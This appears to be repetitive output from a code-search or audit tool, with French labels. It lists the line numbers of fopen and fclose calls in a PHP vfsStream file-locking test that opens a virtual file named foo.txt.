    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
